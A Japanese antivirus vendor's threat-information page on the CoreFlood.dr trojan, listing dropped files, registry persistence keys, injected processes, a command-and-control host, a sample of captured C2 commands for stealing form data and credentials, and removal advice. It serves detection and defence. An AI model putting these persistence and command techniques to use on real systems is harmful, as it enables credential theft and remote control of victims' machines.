製品情報
導入事例
サービス
サポート
ダウンロード
セキュリティ情報
 
- 最新ウイルス一覧
- ウイルス検索
- 駆除ツール
- 主要ウイルスナビゲータ
- Daily DATリリースに関するFAQ
- ウイルス絵とき理解
- ウイルス画像事典
- ウイルス解析依頼
- ウイルス用語集
- ウイルスの危険度格付け
- セキュリティ対策のヒント
- 無料セキュリティ情報サービス
パートナー
会社案内
個人のお客様
中堅・中小企業のお客様
企業のお客様
製品アップグレード
評価版
セミナー・イベント
キャンペーン
サポートQ&A
お問い合わせ
Global Sites:
Home → セキュリティ情報 → ウイルス情報:C
ウイルス情報
ウイルス名危険度
CoreFlood.dr!C2D4DB2D
企業ユーザ: N/A
個人ユーザ: N/A
種別トロイの木馬
最小定義ファイル
(最初に検出を確認したバージョン)		5720
対応定義ファイル
(現在必要とされるバージョン)		5722 (現在7080)
対応エンジン5.1.00以降 (現在5.4.00) 
エンジンバージョンの見分け方
情報掲載日2009/08/28
発見日(米国日付)2009/08/25
駆除補足ウイルス駆除のヒント
概要ウイルスの特徴感染症状感染方法駆除方法
セキュリティ情報

最新ウイルス一覧へ >>
最新ウイルス
05/19RDN/Generic ...
05/19Generic Down...
05/19RDN/Download...
定義ファイル・エンジンの
ダウンロード!
  定義ファイル:7080
 エンジン:5.4.00
 
ウイルス検索
 


概要TOPに戻る

・CoreFlood.dr!C2D4DB2Dはトロイの木馬です。ウイルスと異なり、トロイの木馬は自己複製しません。多くの場合、ファイルが有益である、あるいはファイルを欲しいと思わせて手動で実行させることにより繁殖します。最も一般的なインストール方法は、システムやセキュリティを悪用し、疑いを持たないユーザに手動で未知のプログラムを実行させることです。電子メール、悪質な、またはハッキングされているWebサイト、IRC(インターネットリレーチャット)、ピアツーピアネットワークなどを通じて配布されます。

ウイルスの特徴TOPに戻る

・実行時、CoreFlood.dr!C2D4DB2DはsystemsフォルダにCoreFlood.dllという名前で検出されるランダムな名前のocxファイルをドロップ(作成)します。

  • %system%\%random%.ocx

・また、ランダムな名前で以下のデータファイルもドロップします。

  • %system%\dimazylg.dat
  • %system%\ieakscev.dat
  • %system%\rcbdyctl.dat
  • %system%\vwipyspx.dat
  • %system%\w3ssN.dat
(%system%はWindowsのシステムディレクトリ。例:C:\Windows\System32\)

・起動時に自動的に動作するため、ドロップしたOCXファイルはランダムなCLSIDを持つShellIconOverlayIdentifierとして登録されます。以下のレジストリキーと値が作成されます。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ランダムなCLSID}\InprocServer32\: "malware path"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ランダムなCLSID}\InprocServer32\ThreadingModel: "Apartment"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ランダムなCLSID}\: "random"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\wmvdmydf\: "{ランダムなCLSID}"

・作成後、explorer.exeに挿入されます。さらに、以下にも挿入される可能性があります。

  • iexplore
  • firefox
  • opera
  • skype

・さらに、HTTP POSTリクエストをコマンド&コントロールサーバに送信して、情報を送信し、コマンドを受信する可能性があります。CoreFlood.dr!C2D4DB2DはTCPポート80でsoftwarevalidate.comに接続することが確認されています。

・コマンド&コントロールサーバから発信されたコマンドの例は以下のとおりです。

del ID; addto ID 23957327; setstr ID +S
http #hosts +b "http #hosts +up /index.php usr=\\E\\u\\E&wg=\\E\\vUSERDOMAIN=\\E&cn=\\E\\H\\E&i=23957327&v=3177&os=\\E\\O\\E&s=\\E\\p\\E&h=\\E\\h\\E&d=\\d&b=\\b&u=\\Z&k=\\K&m=\\M&panic=\\qpanic$&ie=\\qie$&input=\\qinput$&other=\\qother$&c=\\c&l=\\l"
setwnd 15 https://* * * +K
setwnd 17 https://* * * +K
setwnd 18 * https://* * +K
setwnd 19 * * * +K
setwnd 11 *caja*.es* * * +QHurfPMSW 4096 4 300000
http #hosts +I 480000

・また、以下のコマンドが攻撃者から発信される可能性があります。

  • ADD
  • ADDTO
  • COPY
  • DEL
  • DELCOOKIES
  • DELFROM
  • DISKFLOOD
  • DISKUNFLOOD
  • DONOP
  • ECHO
  • EXIT
  • EXPORT
  • FIND
  • INFO
  • INS
  • JB
  • LISTCOOKIES
  • LOG
  • LST
  • LSTWND
  • MOVE
  • MULTICAST
  • OPEN
  • PERFRM
  • RESOLVE
  • RESPAWN
  • RESTART
  • RMOLD
  • RSV
  • RUN
  • RUNDLL
  • SET
  • SETCOOKIE
  • SETRANGE
  • SETSP
  • SETSTR
  • SETWND
  • SHUTDOWN
  • SPACE
  • STATS
  • TIME
  • UNFREEZE
  • UNIFORG
  • UNINSTALL
  • URL
  • WND

・その他の悪質な活動の一例は以下のとおりです。

  • ユーザ名とパスワードの盗み出し
  • さらなるマルウェアのダウンロードとインストール
  • システムの改変
  • フラッド攻撃

・CoreFlood.dr!C2D4DB2Dは通常、ブラウザの脆弱性を利用して拡散することが確認されています。また、他のマルウェアによってダウンロードされ、psexec.exeを使って他のマシンにインストールされる場合があることも確認されています。

以下の症状が見られる場合、このウイルスに感染している可能性があります。TOPへ戻る
  • ターゲットマシン上に新しいファイルがドロップ(作成)されています。
  • 上記のネットワーク活動が見られます。

感染方法TOPへ戻る

・CoreFlood.dr!C2D4DB2Dはマルチドロッパ型トロイの木馬で、ターゲットシステムに他のファイルをドロップして実行します。自己複製は行いません。一般的には、IRC、ピアツーピアファイル共有ネットワーク、ニュースグループへの投稿や電子メールの添付ファイルなどを通じて配布されます。

駆除方法TOPへ戻る
■現行のエンジンとウイルス定義ファイルを使用して、検出・駆除して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した場合は正常に駆除されます。

Windows ME/XPでの駆除についての補足